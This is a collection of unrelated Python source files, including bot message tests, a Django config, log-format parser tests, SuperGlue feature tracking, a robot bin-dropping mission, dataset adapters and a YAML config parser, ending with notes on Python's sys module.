"group_chat_id": "8dada2c8-67a6-4434-9dec-570d244e78ee",
"ad_login": None,
"ad_domain": None,
"username": None,
"chat_type": "group_chat",
"host": "cts.ccteam.ru",
"is_admin": False,
"is_creator": False,
},
"bot_id": "dcfa5a7c-7cc4-4c89-b6c0-80325604f9f4",
},
)
def test_parse_message_forward() -> None:
inserted_at = dt(2020, 7, 10, 10, 12, 58, 420000, tzinfo=tz.utc)
IncomingMessage.parse_obj(
{
"bot_id": "f6615a30-9d3d-5770-b453-749ea562a974",
"command": {
"body": "Message body",
"command_type": CommandTypes.user,
"data": {},
"metadata": {},
},
"entities": [
{
"data": {
"forward_type": ChatTypes.chat,
"group_chat_id": "b51df4c1-3834-0949-1066-614ec424d28a",
"sender_huid": "4471289e-5b52-5c1b-8eab-a22c548fef9b",
"source_chat_name": "MessageAuthor Name",
"source_inserted_at": inserted_at,
"source_sync_id": "80d2c3a9-0031-50a8-aeed-32bb5d285758",
},
"type": EntityTypes.forward,
},
],
"file": None,
"sync_id": "eeb8eeca-3f31-5037-8b41-84de63909a31",
"user": {
"ad_domain": "ccsteam.ru",
"ad_login": "message.forwarder",
"chat_type": ChatTypes.chat,
"group_chat_id": "070d866f-fe5b-0222-2a9e-b7fc35c99465",
"host": "cts.ccsteam.ru",
"is_admin": True,
"is_creator": True,
"user_huid": "f16cdc5f-6366-5552-9ecd-c36290ab3d11",
"username": "MessageForwarder Name",
},
},
)
|
499575
|
from django.apps import AppConfig
from django.utils.translation import gettext_lazy as _
class AnnouncementsConfig(AppConfig):
"""
Katago Announcements app handles some messages for the front page of the site
"""
name = "src.apps.announcements"
verbose_name = _("Announcements")
def ready(self):
try:
import src.apps.announcements.signals # noqa F401
except ImportError:
pass
|
499609
|
import pytest
from apachelogs import InvalidDirectiveError, LogParser, UnknownDirectiveError
@pytest.mark.parametrize(
"fmt",
[
"%",
"% ",
"%^x",
"%^",
"%{param",
],
)
def test_malformed_directive(fmt):
with pytest.raises(InvalidDirectiveError) as excinfo:
LogParser(fmt)
assert str(excinfo.value) == f"Invalid log format directive at index 0 of {fmt!r}"
assert excinfo.value.pos == 0
assert excinfo.value.format == fmt
@pytest.mark.parametrize(
"fmt",
[
"%x",
"%^xx",
"%{param}z",
"%{x}a",
"%{x}b",
"%{%{x}a",
"%C",
],
)
def test_unknown_directive(fmt):
with pytest.raises(UnknownDirectiveError) as excinfo:
LogParser(fmt)
assert str(excinfo.value) == f"Unknown log format directive: {fmt!r}"
assert excinfo.value.directive == fmt
@pytest.mark.parametrize(
"fmt",
[
"%",
"% ",
"%^x",
"%^",
"%{param",
# '%{x}a', # actually parsed as an unknown directive
"%<a",
"%200a",
"%!a" "%!200a",
],
)
def test_malformed_time_directive(fmt):
with pytest.raises(InvalidDirectiveError) as excinfo:
LogParser("%{" + fmt + "}t")
assert str(excinfo.value) == f"Invalid log format directive at index 0 of {fmt!r}"
assert excinfo.value.pos == 0
assert excinfo.value.format == fmt
|
499624
|
import os
import sys
import cv2
import json
import fnmatch
import argparse
import numpy as np
from tqdm import tqdm
from scipy.spatial import cKDTree
import torch
from torch.utils.data.dataset import Dataset
from utils import *
sys.path.append('./SuperGlueMatching')
from models.utils import read_image
from models.superpoint import SuperPoint
from models.superglue import SuperGlue
def SuperGlueMatcher(model,
superpoints_0,
superpoints_1):
data = {
'descriptors0': superpoints_0['descriptors'][0].unsqueeze(0).cuda(),
'descriptors1': superpoints_1['descriptors'][0].unsqueeze(0).cuda(),
'keypoints0': superpoints_0['keypoints'][0].unsqueeze(0).cuda(),
'keypoints1': superpoints_1['keypoints'][0].unsqueeze(0).cuda(),
'scores0': superpoints_0['scores'][0].unsqueeze(0).cuda(),
'scores1': superpoints_1['scores'][0].unsqueeze(0).cuda(),
'image0': torch.zeros((1,1,480,640)),
'image1': torch.zeros((1,1,480,640)),
}
match = model(data)
confidence = match['matching_scores0'][0].detach().cpu().numpy()
matches = match['matches0'][0].cpu().numpy()
kpts0 = superpoints_0['keypoints'][0].cpu().numpy()
kpts1 = superpoints_1['keypoints'][0].cpu().numpy()
valid = matches > -1
mkpts0 = kpts0[valid]
mkpts1 = kpts1[matches[valid]]
ind0 = np.nonzero(valid)[0]
ind1 = matches[valid]
confidence = confidence[valid]
return mkpts0, mkpts1, ind0, ind1, confidence
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='Extract and track keypoints throughout the video using SuperGlue.',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'--input_pairs', type=str, default='assets/scannet_sample_pairs_with_gt.txt',
help='Path to the list of image pairs')
parser.add_argument(
'--input_dir', type=str, default='assets/scannet_sample_images/',
help='Path to the directory that contains the images')
parser.add_argument(
'--output_dir', type=str, default='dump_match_pairs/',
        help='Path to the directory in which the .npz results and, optionally, '
             'the visualization images are written')
parser.add_argument(
'--max_length', type=int, default=-1,
help='Maximum number of pairs to evaluate')
parser.add_argument(
'--resize', type=int, nargs='+', default=[640, 480],
help='Resize the input image before running inference. If two numbers, '
'resize to the exact dimensions, if one number, resize the max '
'dimension, if -1, do not resize')
parser.add_argument(
'--resize_float', action='store_true',
help='Resize the image after casting uint8 to float')
parser.add_argument(
'--superglue', choices={'indoor', 'outdoor'}, default='indoor',
help='SuperGlue weights')
parser.add_argument(
'--max_keypoints', type=int, default=1024,
help='Maximum number of keypoints detected by Superpoint'
' (\'-1\' keeps all keypoints)')
parser.add_argument(
'--keypoint_threshold', type=float, default=0.005,
help='SuperPoint keypoint detector confidence threshold')
parser.add_argument(
'--nms_radius', type=int, default=4,
help='SuperPoint Non Maximum Suppression (NMS) radius'
' (Must be positive)')
parser.add_argument(
'--sinkhorn_iterations', type=int, default=20,
help='Number of Sinkhorn iterations performed by SuperGlue')
parser.add_argument(
'--match_threshold', type=float, default=0.2,
help='SuperGlue match threshold')
parser.add_argument(
'--extract_descriptor', action='store_true')
parser.add_argument(
'--ego_dataset_folder', type=str,
help='Ego dataset folder')
opt = parser.parse_args()
print(opt)
config = {
'superpoint': {
'nms_radius': opt.nms_radius,
'keypoint_threshold': opt.keypoint_threshold,
'max_keypoints': opt.max_keypoints
},
'superglue': {
'weights': opt.superglue,
'sinkhorn_iterations': opt.sinkhorn_iterations,
'match_threshold': opt.match_threshold,
}
}
superpoint = SuperPoint(config.get('superpoint', {})).cuda()
superpoint = superpoint.eval()
superglue = SuperGlue(config.get('superglue', {})).cuda()
superglue = superglue.eval()
ROOT_DIR = opt.ego_dataset_folder
OUTPUT_DIR = 'superglue_track'
if not os.path.exists(os.path.join(ROOT_DIR, OUTPUT_DIR)):
os.mkdir(os.path.join(ROOT_DIR, OUTPUT_DIR))
# EXTRACT KPTS AND DESCRIPTORS, RUN ONCE!
if opt.extract_descriptor:
loc_list = []
des_list = []
superpoints_list = []
all_images = np.arange(0, len(fnmatch.filter(os.listdir(os.path.join(ROOT_DIR, 'color')), '*.jpg')), step=1)
for index in tqdm(all_images):
color_info = os.path.join(ROOT_DIR, 'color/color_%07d.jpg' % index)
_, gray_tensor, scale = read_image(color_info, 'cpu', resize=[640, 480], rotation=0, resize_float=False)
gray_tensor = gray_tensor.reshape(1, 1, 480, 640)
input_batch = {'image': gray_tensor.cuda()}
with torch.no_grad():
output = superpoint(input_batch)
output_ = {k: [output[k][i].detach().cpu()\
for i in range(len(output[k]))]\
for k in output}
output_['scale']=scale
superpoints_list.append(output_)
output_np = {k: [output[k][i].detach().cpu().numpy()\
for i in range(len(output[k]))]\
for k in output}
des = np.asarray(output_np['descriptors'][0])
loc = np.asarray(
[output_np['keypoints'][0][j] * scale\
for j in range(output_np['keypoints'][0].shape[0])
]
)
loc_list.append(loc)
des_list.append(des.transpose())
torch.save(superpoints_list, '%s/superpoints.pkl' % os.path.join(ROOT_DIR, OUTPUT_DIR))
np.savez('%s/keypoints.npz' % os.path.join(ROOT_DIR, OUTPUT_DIR), loc_list)
np.savez('%s/descriptors.npz' % os.path.join(ROOT_DIR, OUTPUT_DIR), des_list)
else:
# -- load superpoint output
superpoint_filename=os.path.join(ROOT_DIR, OUTPUT_DIR, 'superpoints.pkl')
assert os.path.isfile(superpoint_filename)
superpoints_list=torch.load(superpoint_filename)
superglue_conf_thresh=0.9
num_images = len(superpoints_list)
print('num image: ', num_images)
K = np.loadtxt('%s/intrinsics.txt' % ROOT_DIR)
original_image_id_list = np.arange(0,
len(fnmatch.filter(os.listdir(opt.ego_dataset_folder + '/color/'),
'*.jpg')),
step=1)
assert num_images == len(original_image_id_list)
def get_tracks_parallel(inputs):
i = inputs['i']
superpoints_list = inputs['superpoints_list']
K = inputs['K']
loc = superpoints_list[i]['keypoints'][0].numpy()
num_points = loc.shape[0]
num_images = len(superpoints_list)
track_i = {}
for j in range(i + 1, min(num_images, i + 5)):
# Match features between the i-th and j-th images
x1, x2, ind1, ind2, conf = SuperGlueMatcher(
superglue,
superpoints_list[i],
superpoints_list[j]
)
m = conf > superglue_conf_thresh
x1 = x1[m]
x2 = x2[m]
ind1 = ind1[m].astype(int)
ind2 = ind2[m].astype(int)
num_points_j = superpoints_list[j]['keypoints'][0].shape[0]
track_i[j] = -np.ones(num_points_j, dtype=int)
track_i[j][ind2] = ind1
return (i, track_i)
inputs = [{'i':i,
'superpoints_list':superpoints_list.copy(),
'K':K.copy()} for i in range(num_images - 1)]
# build track dictionary
track_dict = {}
for x in tqdm(inputs):
r = get_tracks_parallel(x)
if r is None: continue
i, track_i = r
# merge the current track dict with the main one
for j, v in track_i.items():
if j not in track_dict:
track_dict[j] = {}
assert i not in track_dict[j]
track_dict[j][i] = v.tolist()
json.dump(track_dict,
open(os.path.join(
ROOT_DIR,
OUTPUT_DIR,
'track_dict.json'
),
'w')
)
# build track matrix
    # NOTE: This will potentially generate duplicates;
    # this is just redundant information for the 3D triangulation
def fetch_graph(g, i, f_idx, start_i):
        # prevent matching features more than 20 frames apart
if (start_i-i) > 20:
return []
if i not in g:
return []
output = []
for j, v in g[i].items():
if v[f_idx] > -1:
output.append((i, f_idx))
for x in fetch_graph(g, j, v[f_idx], start_i):
output.append(x)
# only one match per image for each feature
break
return output
inputs = [
{'i':i,
'track_dict': track_dict.copy(),
'superpoints_list': superpoints_list.copy(),
'K': K.copy(),
} for i in range(num_images, 0, -1)
]
track = []
for x in tqdm(inputs):
i = x['i']
track_dict = x['track_dict']
superpoints_list = x['superpoints_list']
K = x['K']
if i in track_dict:
scale = superpoints_list[i]['scale']
for f_idx in range(superpoints_list[i]['keypoints'][0].shape[0]):
tmp_track = -np.ones((num_images,2))
mask = np.zeros(num_images)
tracklets = fetch_graph(track_dict, i, f_idx, i)
if not tracklets: continue
for tr in tracklets:
if not tr: continue
k, tmp_f_idx = tr
tmp_track[k,:]=superpoints_list[k]['keypoints'][0][tmp_f_idx].cpu().numpy().copy() * scale
mask[k] = 1
count = np.sum(mask)
if count > 3:
mask = mask.astype(bool)
# normalize indices
tmp_track_n = np.hstack([tmp_track,
np.ones((tmp_track.shape[0], 1))]) @ np.linalg.inv(K).T
tmp_track_n = tmp_track_n[:, :2]
tmp_track_n[~mask] = -1000
tmp_track_n = np.expand_dims(tmp_track_n, axis=1)
track.append(tmp_track_n)
track = np.concatenate(track, axis=1)
np.save('%s/track.npy' % os.path.join(ROOT_DIR, OUTPUT_DIR), track)
np.save('%s/original_image_id.npy' % os.path.join(ROOT_DIR, OUTPUT_DIR), original_image_id_list)
print('total number of feature: ', track.shape[1])
|
499701
|
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy_serializer import SerializerMixin
Base = declarative_base(cls=SerializerMixin)
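# Hedged usage sketch (table and column names are illustrative assumptions):
# any model declared against this Base also inherits SerializerMixin, so its
# instances expose to_dict() for serialization, e.g.
#
#   from sqlalchemy import Column, Integer, String
#
#   class User(Base):
#       __tablename__ = 'users'
#       id = Column(Integer, primary_key=True)
#       name = Column(String)
#
#   # user.to_dict() -> {'id': 1, 'name': 'Alice'}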
|
499705
|
import shm
from shm.watchers import watcher
from mission.framework.task import Task
from mission.framework.targeting import PIDLoop
from mission.framework.combinators import (
Sequential,
Concurrent,
MasterConcurrent,
Retry,
Conditional,
Defer,
)
from mission.framework.movement import (
Depth,
RelativeToInitialDepth,
RelativeToCurrentDepth,
VelocityX,
VelocityY,
RelativeToInitialHeading,
)
from mission.framework.timing import Timer, Timeout, Timed
from mission.framework.primitive import (
Zero,
FunctionTask,
NoOp,
Log,
Succeed,
Fail,
)
from mission.framework.actuators import FireActuator
from mission.framework.position import MoveX, MoveXY, PositionalControl, MoveXYRough
from mission.framework.track import (
Matcher,
Match,
Observation,
HeadingInvCameraCoord,
)
from mission.missions.ozer_common import(
ConsistentTask,
CenterCentroid,
AlignHeadingToAngle,
SearchWithGlobalTimeout,
Except,
GlobalTimeoutError,
Altitude,
AlignAmlan,
AMLANS,
Zeroed,
)
from mission.constants.config import bins as constants
"""
Bins 2017!
"""
class Vision(Task):
# Bin IDs
TARGET_BIN = 0 # The bin that was originally covered (even if not currently)
OTHER_BIN = 1 # The bin that was never covered
class BinObs(HeadingInvCameraCoord):
def __init__(self, shm_bin, heading):
super().__init__(shm_bin.x, shm_bin.y, heading)
self.adopt_attrs(shm_bin)
def __init__(self, *args, **kwargs):
super().__init__()
# Vision object needs to be ready for rest of mission to access, so must
# initialize before on_first_run()
shm.vision_debug.color_r.set(0)
shm.vision_debug.color_g.set(200)
shm.vision_debug.color_b.set(255)
self.bins_matcher = Matcher(
[], # We don't know the bins' relative positions ahead of time
num_trackers=2,
)
self.watcher = watcher()
self.watcher.watch(shm.bins_vision)
self.pull()
def on_run(self, *args, **kwargs):
if self.watcher.has_changed():
self.pull()
def coords(self, objs, filter=lambda x: True):
return [(obj.obs.x, obj.obs.y) for obj in objs if obj.obs is not None and filter(obj)]
def target_bin(self):
targets = [bin for bin in self.bins if bin.id == self.TARGET_BIN]
if len(targets) >= 1:
return targets[0]
else:
return None
def classify(self, single_bin=False):
required_bins = 1 if single_bin else 2
if sum(bin.obs is not None for bin in self.bins) < required_bins:
self.loge('Failed to classify, less than {} bin{} available'.format(
required_bins,
'' if required_bins == 1 else 's',
))
return False
covered, uncovered = [], []
for bin in self.bins:
if bin.obs is not None:
(covered if bin.obs.covered else uncovered).append(bin)
if single_bin:
# Prioritize uncovered bin
if len(uncovered) > 0:
target = uncovered[0]
other = covered[0] if len(covered) > 0 else None
else: # Guaranteed at least one bin exists somewhere
target = covered[0]
other = uncovered[0] if len(uncovered) > 0 else None
pattern = [Match(self.TARGET_BIN, target.obs)]
if other is not None:
pattern.append(Match(self.OTHER_BIN, other.obs))
else:
# If two of the same kind of bin detected, guess a classification
def log_same_kind(t):
self.logw('Two {} bins detected, guessing the target/other classification'.format(t))
if len(covered) == 2:
log_same_kind('covered')
target, other = tuple(covered)
elif len(uncovered) == 2:
log_same_kind('uncovered')
target, other = tuple(uncovered)
else: # Guaranteed one bin in each category
target, other = covered[0], uncovered[0]
pattern = [
Match(self.TARGET_BIN, target.obs),
Match(self.OTHER_BIN, other.obs),
]
self.bins_matcher.update_pattern(pattern)
return True
def pull(self):
shm_bins = [
shm.bins_bin0.get(),
shm.bins_bin1.get(),
]
heading = shm.kalman.heading.get()
observations = [self.BinObs(sbin, heading) for sbin in shm_bins if sbin.visible]
self.bins = self.bins_matcher.match(observations)
# Debug locations
for i, bin in enumerate(self.bins):
debug_info_g = shm._eval('vision_debug{}'.format(i))
debug_info = debug_info_g.get()
if bin.obs is None:
debug_info.text = bytes('', 'utf8')
else:
if bin.id is not None:
debug_info.text = bytes('Target bin' if bin.id == self.TARGET_BIN else 'Other bin', 'utf8')
else:
debug_info.text = bytes('Bin {}'.format(i), 'utf8')
debug_info.x, debug_info.y = bin.obs.x, bin.obs.y
debug_info_g.set(debug_info)
class Bins(Task):
def on_first_run(self, vision, *args, **kwargs):
self.use_task(Conditional(
Except(Sequential(
Log('Starting bins'),
Log('Attempting bins assuming both are visible'),
Conditional(
TryBins(vision, single_bin=False),
on_fail=Sequential(
Log('Attempting bins assuming only one is visible'),
TryBins(vision, single_bin=True),
),
)
), Fail(), GlobalTimeoutError),
Log('Bins success! :O'),
Fail(Sequential(Zero(), FastDrop(), Log('Bins failure! :('))),
))
class TryBins(Task):
""" Try to complete bins given a certain number of bins to look for """
def on_first_run(self, vision, single_bin, *args, **kwargs):
self.use_task(Sequential(
Log('Retracting Amlan'),
AMLANS[0].FastRetract(),
Conditional(
Retry(lambda: ClassifyBins(vision, single_bin), 3),
on_fail=Fail(Log('Failed to ever classify bins')),
),
Conditional(
Retry(lambda: Uncover(vision), 3),
on_fail=Fail(Log('Failed to ever remove cover')),
),
Conditional(
Retry(lambda: Drop(vision), 3),
on_fail=Fail(Log('Failed to ever accurately drop markers')),
),
))
class ClassifyBins(Task):
def on_first_run(self, vision, single_bin, *args, **kwargs):
self.use_task(Conditional(
Sequential(
MoveAboveBins(vision),
Timer(0.5), # Wait for vision to stabilize
FunctionTask(lambda: vision.classify(single_bin)),
),
Log('Bins classified'),
Fail(Log('Failed to classify bins')),
))
class Uncover(Task):
def on_first_run(self, vision, *args, **kwargs):
self.use_task(Conditional(
Sequential(
Retry(lambda: MoveAboveBins(vision), 3),
RemoveCover(vision),
),
Log('Bin uncovered!'),
Fail(Log('Failed to uncover bin')),
))
class MoveAboveBins(Task):
def on_first_run(self, vision, *args, **kwargs):
self.use_task(Conditional(
Sequential(
Log('Moving to depth where bins are visible'),
Depth(constants.see_both_depth, error=0.2, *args, **kwargs),
Log('Searching for bin'),
MasterConcurrent(IdentifyBin(vision), SearchWithGlobalTimeout()),
Log('Centering bins'),
CenterBins(vision),
),
on_fail=Fail(Log('Failed to move above bins')),
))
class IdentifyBin(Task):
def on_run(self, vision, *args, **kwargs):
if any(bin.obs is not None for bin in vision.bins):
self.finish()
class CenterBins(Task):
def on_first_run(self, vision, filter=lambda bin: True, precision=0, *args, **kwargs):
def bin_points():
return [
(bin.obs.x, bin.obs.y) for bin in vision.bins
if bin.obs is not None and filter(bin)
]
self.use_task(CenterCentroid(bin_points, precision=precision))
class RemoveCover(Task):
def on_first_run(self, vision, *args, **kwargs):
def check_removed():
bin = vision.target_bin()
return bin is not None and not bin.obs.covered
def CheckRemoved():
return FunctionTask(check_removed)
self.use_task(Zeroed(Conditional(
Sequential(
MoveAboveBins(vision),
Conditional(
CheckRemoved(),
Log('The cover is already gone?!?'),
Sequential(
Zero(),
AlignOverTargetBin(vision, 90),
LiftOffCover(vision),
Log('Verifying the cover was removed'),
MoveAboveBins(vision),
CheckRemoved(),
),
),
),
on_fail=Fail(Log('Failed to remove cover')),
)))
class LiftOffCover(Task):
PICKUP_DELTA_DEPTH = 0.4
DELTA_DEPTH_TIMEOUT = 4
TOTAL_TIMEOUT = 60
SLIDE_SPEED = 0.4
SLIDE_TIME = 4
def on_first_run(self, vision, *args, **kwargs):
self.use_task(Zeroed(Timeout(
Sequential(
Log('Attempting to grab handle'),
GetHandle(vision, AMLANS[0]),
Log('Carrying cover away'),
RelativeToInitialDepth(-self.PICKUP_DELTA_DEPTH, error=0.1),
Timed(VelocityX(self.SLIDE_SPEED), self.SLIDE_TIME),
Zero(),
Log('Dropping cover off here'),
AMLANS[0].Retract(),
Timer(1.5),
Log('Attempting to return to near pre-grab location'),
RelativeToInitialDepth(-1),
Timed(VelocityX(-self.SLIDE_SPEED), self.SLIDE_TIME * 5 / 6),
Zero(),
), self.TOTAL_TIMEOUT)))
class GetHandle(Task):
GRAB_TIME = 4
def on_first_run(self, vision, amlan, *args, **kwargs):
self.use_task(Zeroed(Sequential(
Log('Aligning Amlan'),
AlignAmlan(
vision,
vision.target_bin,
amlan,
Depth(constants.above_bin_depth),
),
Log('Moving to handle grab depth'),
Timed(Depth(constants.grab_depth), self.GRAB_TIME),
Log('Extending Amlan'),
amlan.Extend(),
Timer(2),
)))
class AlignOverTargetBin(Task):
TIMEOUT = 40
def on_first_run(self, vision, angle, double_align=False, *args, **kwargs):
def CenterTargetBin(precision):
return CenterBins(vision, lambda bin: bin.id == vision.TARGET_BIN, precision=precision)
def AlignTargetBin():
return AlignHeadingToAngle(lambda: vision.target_bin().obs.angle, angle, mod=180)
def DepthAlign(depth):
return Concurrent(
AlignTargetBin(),
CenterTargetBin(1),
Depth(depth),
finite=False,
)
self.task = Zeroed(Timeout(Sequential(
Log('Centering over target bin'),
CenterTargetBin(0),
Log('Aligning target bin'),
Concurrent(
AlignTargetBin(),
CenterTargetBin(0),
finite=False,
),
Log('Going half down to precisely align with target bin'),
DepthAlign((constants.see_both_depth + constants.above_bin_depth) / 2),
Sequential(
Log('Going down to fully align to bin'),
DepthAlign(constants.above_bin_depth),
) if double_align else NoOp(),
Zero(),
PositionalControl(),
), self.TIMEOUT))
def on_run(self, vision, *args, **kwargs):
        if vision.target_bin() is None:
self.loge('Failed to align over target bin, lost bin')
self.finish(success=False)
Zero()()
else:
self.task()
if self.task.finished:
self.finish(success=self.task.success)
class AlignBinDepth(Task):
def on_first_run(self, vision, bin_func, *args, **kwargs):
self.use_task(ConsistentTask(PIDLoop(
input_value=lambda: bin_func().obs.length,
output_function=RelativeToCurrentDepth(),
target=1.2,
deadband=0.02,
p=0.7,
d=0.3,
)))
class Drop(Task):
def on_first_run(self, vision, *args, **kwargs):
self.use_task(Conditional(
Sequential(
Log('Starting drop'),
Retry(lambda: MoveAboveBins(vision), 3),
AlignOverTargetBin(vision, 90, double_align=True),
FireMarkers(),
),
on_fail=Fail(Log('Failed to drop')),
))
class FireMarkers(Task):
MARKERS_X_OFFSET = -0.04
FIRE_TIME = 0.5
def on_first_run(self, *args, **kwargs):
self.use_task(Sequential(
Log('Firing markers!'),
MoveX(-self.MARKERS_X_OFFSET, deadband=0.02),
FireActuator('left_marker', self.FIRE_TIME),
FireActuator('right_marker', self.FIRE_TIME),
))
class FastDrop(Task):
def on_first_run(self, *args, **kwargs):
self.use_task(Sequential(
Log('Dropping markers quickly wherever we are now'),
FireMarkers(),
))
class VisionTask(Task):
def on_first_run(self, task_func, *args, **kwargs):
vision = Vision()
self.use_task(MasterConcurrent(task_func(vision, *args, **kwargs), vision))
def Full(): return VisionTask(Bins)
def Found(): return ConsistentTask(VisionTask(IdentifyBin), success=20, total=30)
|
499731
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import pytest # type: ignore
def pytest_addoption(parser):
parser.addoption(
"--can-out-interface", default="None",
action="store",
help="The CAN interface to use with the tests")
parser.addoption(
"--can-in-interface", default="None",
action="store",
help="The CAN interface to use with the tests")
parser.addoption(
"--lin-out-interface", default="None",
action="store",
help="The LIN interface to use with the tests")
parser.addoption(
"--lin-in-interface", default="None",
action="store",
help="The LIN interface to use with the tests")
@pytest.fixture
def can_in_interface(request):
interface = request.config.getoption("--can-in-interface")
if interface.lower() == "none":
pytest.skip("Test requires a CAN board")
return interface
@pytest.fixture
def can_out_interface(request):
interface = request.config.getoption("--can-out-interface")
if interface.lower() == "none":
pytest.skip("Test requires a CAN board")
return interface
@pytest.fixture
def lin_in_interface(request):
interface = request.config.getoption("--lin-in-interface")
if interface.lower() == "none":
pytest.skip("Test requires a LIN board")
return interface
@pytest.fixture
def lin_out_interface(request):
interface = request.config.getoption("--lin-out-interface")
if interface.lower() == "none":
pytest.skip("Test requires a LIN board")
return interface
@pytest.fixture
def custom_database_path():
tests_path = os.path.dirname(__file__)
root_path = os.path.dirname(tests_path)
database_path = os.path.join(root_path, 'nixnet_examples', 'databases', 'custom_database.dbc')
return database_path
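# Hedged usage note (the interface names are illustrative assumptions): the
# hardware-backed tests are enabled by passing the interfaces on the command
# line, e.g.
#
#   pytest --can-in-interface CAN1 --can-out-interface CAN2 \
#          --lin-in-interface LIN1 --lin-out-interface LIN2
#
# Leaving an option at its default of "None" skips the tests that require it.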
|
499735
|
from itertools import chain
import torch
import numpy as np
import glob
import os
import MYTH
from datasets.dataset_adapter import DatasetAdapter
from local_config import base_data_folder
class FlyingThingsAdapter(DatasetAdapter):
"""Adapter for the synthetic Flying Things dataset."""
base_datapath = os.path.join(base_data_folder, 'flying_things_MVS/')
im_width = 1920
im_height = 1080
nr_views = 10
im_scale = 0.25
def __init__(self, **kwargs):
super().__init__(**kwargs)
input_scale = self.im_scale
if input_scale <= 0.25:
input_scale = 0.25
elif input_scale <= 0.50:
input_scale = 0.50
self.camera_scaling = self.im_scale / input_scale
self.datapath = FlyingThingsAdapter.base_datapath.replace('flying_things_MVS', 'flying_things_MVS_%.02f' % input_scale)
self._set_default_splits()
def _set_default_splits(self):
all_elements = self._all_elements()
testing_size = int(len(all_elements)*0.02)
val_size = int(len(all_elements)*0.28)
self.split['test'] = all_elements[:testing_size]
if(val_size > 0):
self.split['val'] = all_elements[-val_size:]
self.split['train'] = all_elements[testing_size:-val_size]
else:
self.split['train'] = all_elements[testing_size:]
def _all_elements(self):
return sorted(glob.glob(self.datapath + "*"))
def get_dataset_name(self):
return "FlyingThingsMVS"
@staticmethod
def get_scene_seed(element):
return element.split('_')[-1]
def get_image_path(self, element, view):
image_path = os.path.join(element,
"scene_%s_frame_%03d.png" % (
self.get_scene_seed(element),
view + 1
)
)
return image_path
def get_depth_map_path(self, element, view, gt=True):
depth_map_path = os.path.join(element,
"%sscene_%s_frame_%03d_depth.npy" % (
"" if gt else self.depth_map_prefix,
self.get_scene_seed(element),
view + 1
)
)
return depth_map_path
def get_normal_map_path(self, element, view, gt=True):
raise NotImplementedError("Normals not implemented for Flying Things MVS")
def get_element_cameras(self, element):
cameras = []
scaler = np.array([[self.camera_scaling, 0, 0], [0, self.camera_scaling, 0], [0, 0, 1]])
for view in range(self.nr_views):
camera_filename = os.path.join(element,
"scene_%s_frame_%03d.png.P" % (
self.get_scene_seed(element),
view + 1
)
)
camera_matrix = np.matmul(scaler, np.loadtxt(camera_filename))
cameras.append(torch.from_numpy(camera_matrix.astype(np.float32)).unsqueeze(0))
return torch.cat(cameras, 0)
def get_element_worldtf(self, element):
world_transform = torch.from_numpy(np.eye(4).astype(np.float32))
return world_transform
valid_centerviews = range(0, nr_views)
def get_view_neighbours(self, cameras, center_view, nr_neighbours):
if nr_neighbours == 0:
return []
cameras = cameras.cuda()
B = cameras.shape[0]
camlocs = cameras.new_empty(B, 3, 1)
invKRs = cameras.new_empty(B, 3, 3)
MYTH.InvertCams_gpu(cameras, invKRs, camlocs)
distances = (camlocs - camlocs[center_view:center_view+1,:,:]).pow(2).sum(dim=1).sum(dim=1)
distances = [d.item() for d in distances]
orders = sorted(range(len(distances)), key=distances.__getitem__)
if nr_neighbours >= len(distances):
return orders
if self._neighbour_selection == "closest":
return orders[1:1+nr_neighbours]
elif self._neighbour_selection == "furthest":
return orders[-nr_neighbours:]
elif self._neighbour_selection == "mixed":
return orders[1:1+nr_neighbours//2] + orders[-(nr_neighbours - nr_neighbours//2):]
else:
raise ValueError("Unsupported neighbourhood selection approach '%s'" % self._neighbour_selection)
|
499766
|
import os
import logging
from datetime import datetime
def get_timestamp():
return datetime.now().strftime('%y%m%d-%H%M%S')
def mkdir(path):
if not os.path.exists(path):
os.makedirs(path)
def mkdirs(paths):
if isinstance(paths, str):
mkdir(paths)
else:
for path in paths:
mkdir(path)
def mkdir_and_rename(path, archive_name=None):
if os.path.exists(path):
        new_name = path + '_archived_' + (archive_name or get_timestamp())
print('Path already exists. Rename it to [{:s}]'.format(new_name))
logger = logging.getLogger('base')
logger.info('Path already exists. Rename it to [{:s}]'.format(new_name))
choice = input('Are you sure? y/[n]')
        if choice != 'y':
print('Give up renaming, exit')
exit(0)
os.rename(path, new_name)
os.makedirs(path)
|
499782
|
import collections.abc
import copy
import importlib
import yaml
import jinja2
from .parser_constants import FIRECROWN_RESERVED_NAMES
def parse(config_or_filename):
"""Parse a configuration file.
Parameters
----------
config_or_filename : str or dict
The config file to parse or an already parsed config dictionary.
If a file, the file should be YAML formatted.
Returns
-------
config : dict
The raw config file as a dictionary.
data : dict
        A dictionary containing each analysis key replaced with its
        corresponding data and the function to compute the log-likelihood.
"""
if not isinstance(config_or_filename, collections.abc.MutableMapping):
with open(config_or_filename, 'r') as fp:
config_str = jinja2.Template(fp.read()).render()
config = yaml.load(config_str, Loader=yaml.Loader)
data = yaml.load(config_str, Loader=yaml.Loader)
else:
config = copy.deepcopy(config_or_filename)
data = copy.deepcopy(config_or_filename)
params = {}
for p, val in data['parameters'].items():
if isinstance(val, list) and not isinstance(val, str):
params[p] = val[1]
else:
params[p] = val
data['parameters'] = params
analyses = list(set(list(data.keys())) - set(FIRECROWN_RESERVED_NAMES))
for analysis in analyses:
new_keys = {}
try:
mod = importlib.import_module(data[analysis]['module'])
except Exception:
print("Module '%s' for analysis '%s' cannot be imported!" % (
data[analysis]['module'], analysis))
raise
if hasattr(mod, 'parse_config'):
new_keys['data'] = getattr(mod, 'parse_config')(data[analysis])
new_keys['eval'] = getattr(mod, 'compute_loglike')
new_keys['write'] = getattr(mod, 'write_stats')
else:
raise ValueError("Analsis '%s' could not be parsed!" % (analysis))
data[analysis] = new_keys
return config, data
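# Hedged usage sketch (the file name is an assumption, not part of firecrown):
# parse() accepts either a YAML path or an already-loaded dict and returns the
# raw config plus, for every analysis section, its parsed data and callables.
#
#   config, data = parse('example_config.yaml')
#   analyses = set(data) - set(FIRECROWN_RESERVED_NAMES)
#   # for each analysis, data[analysis] is {'data': ..., 'eval': ..., 'write': ...}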
|
499840
|
import sys,os
#sys
# li = sys.argv
#
# if li[1] == "post":
# print("post")
# elif li[1] == "down":
# print("1111")
'''
sys.argv      # list of command-line arguments; the first element is the path of the program itself
sys.exit(n)   # exit the program; a normal exit is exit(0)
sys.version   # version information of the Python interpreter
sys.path      # module search path, initialized from the PYTHONPATH environment variable
sys.platform  # name of the operating system platform
sys.stdin     # standard input
sys.stdout    # standard output
